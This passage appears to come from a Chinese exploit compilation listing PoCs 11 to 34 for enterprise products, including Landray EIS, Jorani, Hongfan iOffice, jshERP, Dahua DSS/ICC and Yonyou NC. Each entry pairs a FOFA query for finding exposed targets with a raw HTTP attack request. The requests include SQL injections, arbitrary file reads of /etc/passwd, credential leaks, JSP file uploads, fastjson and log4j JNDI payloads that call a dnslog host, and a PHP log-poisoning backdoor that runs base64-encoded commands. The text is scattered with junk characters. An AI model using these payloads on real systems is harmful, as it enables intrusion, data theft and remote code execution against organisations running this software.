, ^& o' @0 p0 e7 v% b------WebKitFormBoundaryxdgaqmqu
' A# r5 f6 K# d8 ]* H7 K$ l) mContent-Disposition: form-data; name="file"filename="icfitnya.txt"9 O& q) n0 e; A; ?
Content-Type: text/html
5 j$ {5 O4 ]% w! S4 t# v2 t
( j7 P* c2 g- p; I! z/ ljmnqjfdsupxgfidopeixbgsxbf6 X7 P0 m8 z9 }" T$ k: [
------WebKitFormBoundaryxdgaqmqu--
  i4 r4 p, E/ e2 G" |
! m% y: \0 w$ M1 e8 d: P! ?" P  [0 R; v+ P( U! f7 G+ G5 T# u
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 |8 ]' Z3 R5 cFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
" w2 {! t  I9 _; x, Z9 Q8 X" z+ gGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
% Y% _7 {* |2 Z7 QHost: 127.0.0.1
# }# P! _# {, W$ P; N; P0 m1 @Pragma: no-cache) _) q; q* a( W- {
Cache-Control: no-cache7 U/ B2 a5 F1 `% @7 Q: U8 y: J
Upgrade-Insecure-Requests: 1
" q) C  k) S  I) F& b5 O* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! b9 A- `. V0 R7 I) {& A% R4 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; N) F  ^: _, Y% m. MAccept-Encoding: gzip, deflate
  u6 G, C  m) E, XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
& v1 l* c* {4 JConnection: close# M) T! y) @/ }9 a

3 E7 \. w4 h) c$ h8 t  ]1 L, X+ D% N, m5 W! F
12. Jorani < 1.0.2 远程命令执行
' X! B' B) G9 f5 H6 E% rFOFA:title="Jorani", d1 F: Z" z1 V# t2 D6 v# @6 g2 U
第一步先拿到cookie
. _; X9 Y3 J, d/ Q, OGET /session/login HTTP/1.1
9 P2 V5 I+ ?, UHost: 192.168.190.30
3 i; E4 k4 R1 yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
9 Z! @* A) I; W0 fConnection: close
( \0 B) w1 h! A3 S; GAccept-Encoding: gzip; V4 Z; v% H) g5 H+ |' |9 \
8 v& C$ `: q3 C1 V# j' s2 e$ Q7 t, c

; ?' @( l" t8 C响应中csrf_cookie_jorani用于后续请求) p: ^  @9 I) _! o
HTTP/1.1 200 OK" z( m) T2 i, K9 R) N- r
Connection: close, q- @3 e: t) V- T. X1 ^
Cache-Control: no-store, no-cache, must-revalidate9 Z5 P, p: S& m5 m( O
Content-Type: text/html; charset=UTF-8  N" l0 \0 z; [" N
Date: Tue, 24 Oct 2023 09:34:28 GMT6 d1 f# Z& o5 C6 k
Expires: Thu, 19 Nov 1981 08:52:00 GMT4 ~2 T9 I5 I( g7 d3 _1 T
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT6 @+ h$ [* F- e; j  d
Pragma: no-cache
0 l( Z* n3 p0 n) OServer: Apache/2.4.54 (Debian)- R* Q8 `1 ^/ Q2 _$ x7 E5 \: Y& \
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
1 f4 }* X+ r; D3 d2 o3 I  E! ]$ ESet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly$ A/ @  {: C' D* l7 I
Vary: Accept-Encoding
, o% o7 V/ B# b7 j$ p4 F4 I) [! o& D  v; q- g. {* w
0 Z% m* e, `$ x$ }
POST请求,执行函数并进行base64编码
, Z- m; x% a! Y7 K. N& h  hPOST /session/login HTTP/1.1
+ G& b) m5 r' c* i2 ~/ hHost: 192.168.190.30
6 o2 i5 n, J- n) |+ }8 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.363 N8 A! I) x  x  X% j+ f+ j+ ]
Connection: close
- C; D4 ]$ V: C! Q' V, S% MContent-Length: 2528 N8 z% v. p7 G  v$ r, p
Content-Type: application/x-www-form-urlencoded  b6 z" w* b9 Z6 b' [3 b! z( E
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r! y7 q9 C0 I9 n* ~( n
Accept-Encoding: gzip
  ?9 k8 [, F- k- @# {. F" b& {+ Z2 k8 {. q4 y, T* M* ~
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor0 a+ Q( T1 ~% r1 M0 r: L3 F' k

/ @% e9 A9 t! L$ [) K5 W
" e7 @7 Y0 V3 T9 N$ q5 J1 z$ T, G2 e( _) l! g- l
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串# Z. Z* T8 ]% N1 f- k
GET /pages/view/log-2023-10-24 HTTP/1.16 u8 z* i- C) r4 f4 O4 E. u9 h
Host: 192.168.190.300 e* e2 a/ y2 }( H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" w. ]* Q' {* S' c! LConnection: close' p7 J& x- @1 b! k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
" |( N; J; N4 X- FK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=) q0 E. A1 B% ?; F- C9 U/ n4 I
X-REQUESTED-WITH: XMLHttpRequest
1 H- y$ d' ?+ z) X& U  _9 |Accept-Encoding: gzip
3 B* E* Q8 |' r! ]; ]* u* M
8 ^" c( ?, K# D1 [- _9 D" n$ y+ N0 l4 Z& y+ E
13. 红帆iOffice ioFileDown任意文件读取# J# Y+ N5 h) j4 M" Q4 c$ {
FOFA:app="红帆-ioffice"" N" g8 M" V9 k, P1 e
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1- F0 b: K( m- z2 i
Host: x.x.x.x% f; ]3 r; n5 Y) r. m4 i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ }& Z) S/ f5 t  _2 b6 R7 B
Connection: close0 d+ [) M) A( V- C5 D6 y3 l
Accept: */** C' n+ L+ ?& C' q4 E. P, U4 x
Accept-Encoding: gzip: E( y" G, J* s- s, W  k# p* Z
+ \& l1 _$ a, K. D9 J$ h

1 ^) v* B6 U  }14. 华夏ERP(jshERP)敏感信息泄露& t( @+ A- h% X4 ~& o
FOFA:body="jshERP-boot"
5 E9 _& ^0 {6 X2 p9 s. ]: |5 C( X: J泄露内容包括用户名密码
% W) p1 M" ~- {$ d6 M' S3 T7 }! q0 iGET /jshERP-boot/user/getAllList;.ico HTTP/1.1$ \7 ]$ {7 Y  |
Host: x.x.x.x( N9 b# g$ u# E- F, ^& G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! }, G, A: e3 V9 \& n7 X1 w, }Connection: close
8 V2 c% m/ K" p( f$ y8 G/ w5 TAccept: */*- X) X* e0 Y0 y* y% I0 L
Accept-Language: en  s4 K9 W# f/ \* L$ p4 B: x
Accept-Encoding: gzip
+ n! J( \0 D1 B6 N2 h
- k* \' ?1 z! f' E8 O$ {
3 j8 X3 X8 m' T/ |5 b15. 华夏ERP getAllList信息泄露7 v; E7 ?$ F+ j. H) z
CVE-2024-0490
' a  a# F% o, ^- BFOFA:body="jshERP-boot"
+ j/ a; e% T4 n4 {8 z泄露内容包括用户名密码
  Z1 i" v6 w. I4 [$ wGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
  R) l4 z% _5 l7 j" O8 SHost: 192.168.40.130:100
5 X  O  v7 m  Q( a, D% f% mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" D/ G2 c. ^! X* DConnection: close# v/ j) h! ~% q. K. ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8/ y9 T3 \! D( ]
Accept-Language: en
+ c- ?% Q: e- D6 m- B0 Esec-ch-ua-platform: Windows; K  v& s4 ?- a* E
Accept-Encoding: gzip2 s2 E9 o& z) x& K6 S$ j

+ a+ o$ W# @, o& ~  Y- ?8 h
9 W' s# [* h$ a/ w  q, a8 D5 d16.  红帆HFOffice医微云SQL注入; N2 w/ f0 \5 P  q4 N
FOFA:title="HFOffice"4 ^7 I+ ^; ~) c8 F
poc中调用函数计算1234的md5值
  ]. M" t8 n4 W; S9 S$ FGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! \7 X$ O1 ~9 w: T6 J* mHost: x.x.x.x
8 ?: X! W/ @1 b4 pUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
% Z3 _0 t9 ]0 J! o* n1 k4 kConnection: close
3 W' Z+ x) w$ G* tAccept: */*
0 f- @8 h9 A. F1 O6 K* @Accept-Language: en" M8 l( K& Z; e9 J: C
Accept-Encoding: gzip
8 B, h5 F" V( E% k9 d
& \& P7 n2 p% U1 S0 g/ z/ B% N" w# U9 |5 |( i$ `
17. 大华 DSS itcBulletin SQL 注入+ ~3 p, X0 W' v9 B( n
FOFA:app="dahua-DSS"6 P* P5 E9 N# x  S
POST /portal/services/itcBulletin?wsdl HTTP/1.1' i  a' y8 x  J# t) P- \* _( K8 E
Host: x.x.x.x: \9 r/ V# `$ t& E: _- [+ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- I8 |) d1 F: N2 c
Connection: close$ a" ]: c; Y0 a, L$ E, @
Content-Length: 3456 D0 T/ N: ?2 L# F0 G
Accept-Encoding: gzip
! e( N4 R1 x0 J% u3 F% t. j
" W! |* A* {/ J! t9 R5 p2 @<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
+ s1 O, `, |  h, l/ U' V<s11:Body>
, c6 u" e; t. z( T3 J    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
* n# S* o, K" Y! n2 l, r      <netMarkings>) ]  j; v9 X' u- ^$ M
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
2 d$ E/ A& A% R      </netMarkings>
, f: a0 j, U5 d/ j6 N5 ?* m    </ns1:deleteBulletin>8 o  r2 c' g( \, h9 ~
  </s11:Body>3 b3 [" K0 v6 ]
</s11:Envelope>7 j3 G2 X2 w; t5 m
% z9 Q  ^3 Z  r+ P" }1 [. B0 [

: m) d0 ~( \$ Z* e+ J18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) f% ]3 g$ `* ?& d
FOFA:app="dahua-DSS"
% O6 s( ]$ i! Q+ n; r. w: kGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1; F- U1 P5 t* V! i- l1 a0 @) E7 z7 v
Host: your-ip7 S! z( |& E. S1 w; d! o  m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  R! f7 D0 v; L$ R# wAccept-Encoding: gzip, deflate
( S6 w2 h2 H/ @7 iAccept: */*
! |) s: w. l) \/ U* [Connection: keep-alive* J( ^1 i8 `; X" ]0 A  a1 J

9 w- J, G! y) H% e) N# @  _6 `
4 m5 `7 Y4 M! D/ c
" P9 E# D$ C9 b8 d8 X( U0 p19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 I6 ]( o" I$ y& z- f
FOFA:app="dahua-DSS"
0 d$ V3 [  i2 wGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1' F) }8 Z4 v# L- T
Host:" J  f& G: {5 m/ j
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 C# w" w9 g9 a8 G* T& OAccept-Encoding: gzip, deflate5 |+ T  R; y1 ?  X* X
Accept: */*3 w! H' y+ _4 z/ u, N( _
Connection: keep-alive9 p7 }7 D# i& k* C
* x+ _! A0 k; B* _
; J9 T3 Z( w0 J6 P% b
20. 大华ICC智能物联综合管理平台任意文件读取! _, k! J! E3 C: C
FOFA:body="*客户端会小于800*"
1 G0 F) i& r2 _1 YGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1# m7 Q5 f4 d, G5 y
Host: x.x.x.x
8 X6 U4 l; @) Z" ~" [9 o5 _User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 D* R* \' t2 h. [% Y( u* L
Connection: close% g' B4 S' n6 }- F/ Q
Accept: */*
$ d3 {7 `5 u% E6 U( p/ H" m. zAccept-Language: en% f+ E2 `3 V8 A1 S- L9 o+ P
Accept-Encoding: gzip
$ a/ l3 P$ ?, K6 e- w/ u) g# y" y7 z! G0 R4 \; X

, K: L' e/ V/ h( L  t; G/ l$ \( r21. 大华ICC智能物联综合管理平台random远程代码执行/ m/ S; m& d9 u- T3 b- g
FOFA:icon_hash="-1935899595"
6 Q5 n" v: R2 ^. y5 e. BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
) p, |$ C# _/ r; PHost: x.x.x.x5 X. \. \% Z! v6 b; ]. s* B5 v7 ~& J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  s. F$ Z- c9 e5 m+ B! l7 uContent-Length: 1614 \. x0 G; Q$ ~# ^, m- I
Accept-Encoding: gzip
1 G5 p3 ^! R( NConnection: close2 w& x5 J0 s+ n  h
Content-Type: application/json;charset=utf-81 k6 o4 \+ ]4 x- U2 d, W
7 ?7 {. N/ l8 D
{0 ^! z) f% P& X6 a0 |* d
"a":{
& j- B! }6 ^+ P+ G5 A   "@type":"com.alibaba.fastjson.JSONObject",* m' `1 U3 k& G& }. O7 ?
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
" u1 b# ^- \* K- L5 K+ c: z  }"", D2 U' [: E' \" F: n7 F- U
}
" z1 c6 f& m! Y7 z) L- h
. W+ X; o$ d* d$ [7 C% z- P, R% I2 V) T. X
22. 大华ICC智能物联综合管理平台 log4j远程代码执行) C5 |2 X4 r1 d7 i& n
FOFA:icon_hash="-1935899595"6 N0 X; r  o+ Z* k
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
, i0 p: X4 K# x' y. }- u( {2 \Host: your-ip
  Z6 T  z  s  O# z" P5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 Z- a6 n+ p, ]# i. LContent-Type: application/json;charset=utf-85 n$ F+ i7 Q  l& L- d$ `
5 R9 ?$ Y/ b7 b) E
{" g/ e: U+ }! M
"loginName":"${jndi:ldap://dnslog}"
2 _3 E# w: A7 `* ^% M1 w& w  e) E( P}8 ^/ ?' }5 J2 n2 ^9 g; r3 \# P
: y/ d1 P- X  j4 w3 x$ M
# @* X2 y( U9 D1 z5 V1 y
/ i- ~+ a0 v% B# k. E$ D+ V% o
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ E" j- M; P6 c/ ^; PFOFA:icon_hash="-1935899595"; C# Y$ |! H& [5 v  Y
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# a$ ^. H, I9 `/ X7 u6 LHost: your-ip
5 S8 W) k3 j2 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" z0 r' j7 w! n: A6 Q3 A3 X8 x
Content-Type: application/json;charset=utf-8
+ k) h5 ~# K# B$ C7 V% G8 Z" i! aAccept-Encoding: gzip& l$ E/ l4 s2 z  c
Connection: close3 k' k% K( l; j  `! [+ O

9 o3 M% V' p1 H5 T" s& W/ O{8 e; n: c' x4 z; C  b5 q
    "a":{" g! w  m# T; _: g- M+ M
        "@type":"com.alibaba.fastjson.JSONObject",
1 P% S. m  q  a  X2 \       {"@type":"java.net.URL","val":"http://DNSLOG"}& t, m  e4 W$ c7 m
        }""
/ F7 A: `, K2 D; v5 O}
: D, P0 e# p( c: f8 I
/ N* o% B( c7 U1 k6 n- [" r9 {$ ^% d& c) r/ j
24. 用友NC 6.5 accept.jsp任意文件上传
7 p- k" e$ N( P% W3 ]# U) U# n5 `FOFA:icon_hash="1085941792"$ s! {9 q; m) G# I+ B
POST /aim/equipmap/accept.jsp HTTP/1.15 J$ N" `% R' b) Y6 k
Host: x.x.x.x/ l: `/ i8 z% A9 b( c( _! z; X
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 ^6 {6 i# d! e4 g0 m1 _
Connection: close
# b) J8 d. S: O1 ~$ v0 JContent-Length: 449! W8 y' l$ G1 O3 B: }) F. W- X
Accept: */*# j: C& N2 Y5 o7 S( b1 f
Accept-Encoding: gzip
8 W: Y; u# |# g1 C5 IContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
" x2 u. t+ ~5 _+ Z
! Y4 W! [' k$ e-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# m8 H4 `! g  a$ M4 a' `Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
; l# B; f2 H# I  C$ oContent-Type: text/plain
2 T0 b( o9 W' l' [9 I, _4 ?8 g6 w9 t9 {) I
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>* p/ x, t) q# k* ]0 @4 B. ^
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: p9 ~4 a: z8 C' V) m! x) s
Content-Disposition: form-data; name="fname"7 T4 Y, J( H+ l. F

' Z$ i* y+ e  W' T1 ?0 D, d: h4 z\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp* q. s) |% K/ W) L( T
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
8 N) y7 _4 d8 a8 J% j& V6 G! H, a

- b7 f" F. K1 W7 ?) r, x25. 用友NC registerServlet JNDI 远程代码执行6 d0 B' H& F! c% X
FOFA:app="用友-UFIDA-NC"
! O+ T9 ~) I" H1 x/ LPOST /portal/registerServlet HTTP/1.1
& p( L% r! N% iHost: your-ip
7 e1 B/ x/ I7 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
0 R" T0 z( @5 t4 G4 I" ^0 _! \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9, ?5 v2 i" k$ y: F5 f/ C
Accept-Encoding: gzip, deflate3 l4 c. c) l. L' \: _
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.62 N! N+ Z% V' ^* E) {
Content-Type: application/x-www-form-urlencoded
7 F, o! A! T) Y# ^3 b8 w, F5 M% H9 F5 B
type=1&dsname=ldap://dnslog  Y/ L+ r+ N; E# H
# L+ m$ G3 {! T9 w8 T( s
' `; X- C4 ~  N2 m9 m
) R0 ~% g: _* z1 i% z5 g! y
26. 用友NC linkVoucher SQL注入/ k% P, ]1 {5 ~/ O/ S* R% E- F
FOFA:app="用友-UFIDA-NC"
$ A; {0 L* A0 A5 V/ z" {  hGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ B4 N7 ~3 H# L: \* _* j
Host: your-ip* {3 K) r) T! U& G, u6 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; ]- s. m/ r% a0 I4 g  G2 oContent-Type: application/x-www-form-urlencoded
% G+ i- E6 P! \* Q* N  m& xAccept-Encoding: gzip, deflate
; p- @/ ]; m1 ?. w; TAccept: */*
/ F3 M9 z; X) R' y! QConnection: keep-alive
, Y. ^9 M' X; u( s- e# G* J7 \8 t5 Q/ g9 J8 G' W! s+ h5 ]
7 Y3 o9 h( o  z
27. 用友 NC showcontent SQL注入1 I% I6 r: J: c- N; I
FOFA:icon_hash="1085941792"0 D- n+ l$ d- m1 x
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
- `, m6 l: I7 M$ e$ G* s3 m5 M2 PHost: your-ip
2 t; {+ m5 [) a+ J* jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* i% O+ B; ?4 }7 R- W
Accept-Encoding: identity1 x! Y" t8 j4 u
Connection: close
3 I! [9 C$ `9 j' [+ ]6 _Content-Type: text/xml; charset=utf-8! ]$ n3 S4 K+ V& c0 b
4 }  r! y& A& ~( `
, N5 L7 `: x' i
28. 用友NC grouptemplet 任意文件上传
0 V3 ]: e7 ^  B7 H& ~FOFA:icon_hash="1085941792"
/ {0 a2 Q$ V4 q/ U7 e# o* JPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.16 K2 L) `7 x) Z' W
Host: x.x.x.x
% w: w$ w7 J1 ]8 |. ?! E9 Z+ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* ^$ Q! p7 A2 A# q* J! ?5 V
Connection: close. Q2 A- h* H% R$ ^; }0 v; z
Content-Length: 268
0 s, b2 r) t5 q( }/ g7 lContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% B+ r# u7 x- z$ Q# I/ w7 W, NAccept-Encoding: gzip! O  L. c4 P( F/ F, [

: J% d9 w0 Z; ], E, [* }------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk" B, |  |7 A' t! {+ u- r4 G9 Z
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"& F6 O6 ^! r- ^% M
Content-Type: application/octet-stream8 d  N5 o& A! E4 H5 N
  B  F1 @& K& W5 p5 R
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
1 P, g, h* p1 ]- f------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--& b  s6 A4 R, \" x

/ S1 Z( I8 I4 ^
5 E8 f5 W/ q1 S! q  [( Y/uapim/static/pages/nc/head.jsp0 C8 W% E* _; c& t, T6 u
! \. @6 F% v8 p
29. 用友NC down/bill SQL注入
1 _% q! n  g  AFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% p$ r- t) a+ w. A' d2 O  ?; S  iGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
& h) [* M+ y& i8 x+ A8 }Host: your-ip
' M6 \7 Y# j3 M' c6 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! k5 Z! z! Q' Q5 r- D
Content-Type: application/x-www-form-urlencoded0 B! |6 d1 s, @7 _4 Y! j  `
Accept-Encoding: gzip, deflate( S" C  b( B; x# h3 n8 t
Accept: */*
1 F* m: J) t5 ^9 Z. mConnection: keep-alive
  o' S# }7 l$ L" I: I
5 G: j5 m# L/ @  N
# t2 F5 y: U# W6 i. b1 L) v30. 用友NC importPml SQL注入$ T. [8 ~2 D7 R4 I* g* j' G. V  \0 Z  `
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ d" y/ a2 G! q* d' Y5 w" ^1 d
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
7 Z; ~' ~' |/ y  UHost: your-ip0 c4 y2 J* C5 F* r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
0 Q! I# H6 e$ I) B8 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' H$ g& d+ C# x, a+ x2 IConnection: close$ i+ f& a5 f3 u: Z

& y5 W# a: l+ n$ S------WebKitFormBoundaryH970hbttBhoCyj9V3 o+ K" z( e% C2 R
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
# A3 k1 Y" N" e$ \2 a0 ?) rContent-Type: image/jpeg& a. U- D# G7 ^) F. B
------WebKitFormBoundaryH970hbttBhoCyj9V--( B: W1 @5 w% I4 D4 F8 t- O
( ^& q# ^. C4 a3 A% R' e. `

6 G3 K- j/ e5 W31. 用友NC runStateServlet SQL注入" [; Z3 J* ^% E  O( t/ }
version<=6.56 r; |+ a; \( Y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 O0 r6 D% l; z. K
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ A% E' x1 z3 W' O# H, X
Host: host
' [- C; w2 s. X! y$ `2 ~% eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
: t8 Q; L/ ~( a1 zContent-Type: application/x-www-form-urlencoded
4 F* t" P* A0 P2 o& w6 O3 I" _/ F/ N8 q0 g

& ~# g: S+ ], a& h' C; d, N2 t32. 用友NC complainbilldetail SQL注入
& i7 m' C) F1 }, D/ X) j# p0 Uversion= NC633、NC65+ `8 M) Y6 \4 m6 n, i  O% `
FOFA:app="用友-UFIDA-NC"! @: ^0 H, U5 w" J* ]
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1( s: K( C0 [5 O  Z1 E
Host: your-ip0 b( H' T7 A+ K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 R9 @; E# G3 O" T8 Y, x# V
Content-Type: application/x-www-form-urlencoded' X  Y$ R, [0 z" C/ \! M% J
Accept-Encoding: gzip, deflate
3 n+ }$ G. l2 QAccept: */*
% l' G: h3 `* H2 W: `6 |Connection: keep-alive6 }+ W+ X% [( E

7 V) S: ~1 G  y. C2 }
2 [& Y4 e- V; }1 Y7 O33. 用友NC downTax/download SQL注入
: q; j# l- c! gversion:NC6.5FOFA:app="用友-UFIDA-NC"+ l3 T( |  b) N8 Z2 ~1 ]
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1  F+ ^3 w1 M" D& C; \& w2 _
Host: your-ip
) L/ Q, Z' n, x) @, W9 m$ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- U2 |( {) i1 Z6 P: @6 f* g
Content-Type: application/x-www-form-urlencoded
7 z4 m' a1 c9 U4 R1 SAccept-Encoding: gzip, deflate: _9 e. @- W7 }) e$ h" n, M. Z
Accept: */** T. G& r8 J0 N: k2 d% S
Connection: keep-alive$ X0 ^0 b0 U4 k! S5 D9 O4 _
4 K' r3 U# Q/ M. t6 V" h
* w7 N4 z  c+ t- t. \
34. 用友NC warningDetailInfo接口SQL注入
. w( u6 {- A2 [4 nFOFA:app="用友-UFIDA-NC"  p4 }! S/ d; _8 E8 Q7 ~
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 h! i8 k# T  \# h4 a. t' f; DHost: your-ip
